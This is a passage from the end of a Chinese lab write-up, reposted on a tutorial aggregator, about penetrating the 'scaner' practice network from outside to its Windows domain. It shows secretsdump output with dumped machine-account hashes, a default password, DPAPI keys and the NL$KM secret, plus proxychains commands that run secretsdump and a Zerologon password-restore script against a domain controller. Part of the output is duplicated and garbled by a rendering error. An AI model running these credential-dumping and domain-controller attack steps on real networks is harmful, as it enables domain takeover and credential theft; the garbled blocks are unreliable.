$MACHINE.ACC:plain_password_hex:3c6da21c49ad3ad0576f9ae27a373f29e4ba38394dbb9226a09399c45a82afbdf0a5fe04c97e564511800fc4f05c16c7d3c82cd37e9abbfd303d444bf98389a38e0dd0ee4f36d9ea8b11ee90c4a22da811eb35e036405ccf89913b95c353b2f90466c69a076afc338a6d2fe2cd8a185b9f656b92da5ee93bb098e82962f14d6813228a806e4a9fea4b3d5112a3ee799fe88f8767b03caf546cd59903b5a8d7e6ab3d6f3683024e74e3928df3cdf0791f3e58dc35c7a83344f020c22e2a42dd264d9a8f150d6d626955b8920e8559f90f9761ecf9d75976acb3762ab4468f3dac577ef1f52b89a6c8a13de18e21497c38
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:049d2188a55da0d1511d4391043c3a68
[*] DefaultPassword 
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xdaf7eb3f8c0c99f3a9d8294f8d8c20c66eb4bf38
dpapi_userkey:0xc74d45a5227c64b3efa07ce8d331c7d224891ed5
[*] NL$KM 
 0000   AA C3 E0 AC C2 DA 1C 8A  E2 DB 90 CA 31 0B 7E 7A   ............1.~z
 0010   6F 59 D2 1E BE 59 7D 65  25 B2 88 77 DE 20 C5 B2   oY...Y}e%..w. ..
 0020   92 A6 4D 30 2D 1F 40 7D  64 2D 47 3B 92 C4 04 9D   ..M0-.@}d-G;....
 0030   EB DE 94 64 A6 7F 7F 5C  13 61 F4 C8 6E BA 0E B5   ...d....a..n...
NL$KM:aac3e0acc2da1c8ae2db90ca310b7e7a6f59d21ebe597d6525b28877de20c5b292a64d302d1f407d642d473b92c4049debde9464a67f7f5c1361f4c86eba0eb5
[*] Cleaning up... 

proxychains4 python3 reinstall_original_pw.py ad 10.10.10.135 049d2188a55da0d1511d4391043c3a68 
NetrServerAuthenticate3Response 
ServerCredential:               
    Data:                            b'\ix84|TW3O' 
NegotiateFlags:                  556793855 
AccountRid:                      1001 
ErrorCode:                       0 


server challenge b'\xb1xbdx1d,tPS'
session key b'?:x1axd4x1fx91xdaxfbxa3Gxedrx1bxd0x03h'
NetrServerPasswordSetResponse 
ReturnAuthenticator:            
    Credential:                     
        Data:                            b'x01Cx19x91Xxcax8dx7f' 
    Timestamp:                       0 
ErrorCode:                       0 



Success! DC machine account should be restored to it's original value. You might want to secretsdump again to check.

验证

proxychains4 python3 secretsdump.py scaner/ad$@10.10.10.135 -no-pass

b435b51404ee:049d2188a55da0d1511d4391043c3a68
[] DefaultPassword
(Unknown User):ROOT#123
[
] DPAPI_SYSTEM
dpapi_machinekey:0xdaf7eb3f8c0c99f3a9d8294f8d8c20c66eb4bf38
dpapi_userkey:0xc74d45a5227c64b3efa07ce8d331c7d224891ed5
[] NLKaTeX parse error: Expected 'EOF', got '}' at position 146: … C5 B2 oY...Y}̲e%..w. .. 0020…KM:aac3e0acc2da1c8ae2db90ca310b7e7a6f59d21ebe597d6525b28877de20c5b292a64d302d1f407d642d473b92c4049debde9464a67f7f5c1361f4c86eba0eb5
[
] Cleaning up…




proxychains4 python3 reinstall_original_pw.py ad 10.10.10.135 049d2188a55da0d1511d4391043c3a68
NetrServerAuthenticate3Response
ServerCredential:
Data: b’ix84|TW3O’
NegotiateFlags: 556793855
AccountRid: 1001
ErrorCode: 0

server challenge b’\xb1xbdx1d,tPS’
session key b’?:x1axd4x1fx91xdaxfbxa3Gxedrx1bxd0x03h’
NetrServerPasswordSetResponse
ReturnAuthenticator:
Credential:
Data: b’x01Cx19x91Xxcax8dx7f’
Timestamp: 0
ErrorCode: 0

Success! DC machine account should be restored to it’s original value. You might want to secretsdump again to check.


验证

proxychains4 python3 secretsdump.py scaner/ad$@10.10.10.135 -no-pass
在这里插入图片描述
感谢月师傅的靶场。
在这里插入图片描述

每个人的心里,都有一个忘不记,却无法拥抱珍惜的人。

最后

以上就是成就玉米为你收集整理的scaner从外网到内网域渗透笔记scaner 从外网到内网域渗透1.环境配置2.外网打点3.xyhcms漏洞分析4.linux提权5.内网渗透6.内网域渗透的全部内容,希望文章能够帮你解决scaner从外网到内网域渗透笔记scaner 从外网到内网域渗透1.环境配置2.外网打点3.xyhcms漏洞分析4.linux提权5.内网渗透6.内网域渗透所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(59)

评论列表共有 0 条评论

立即
投稿
返回
顶部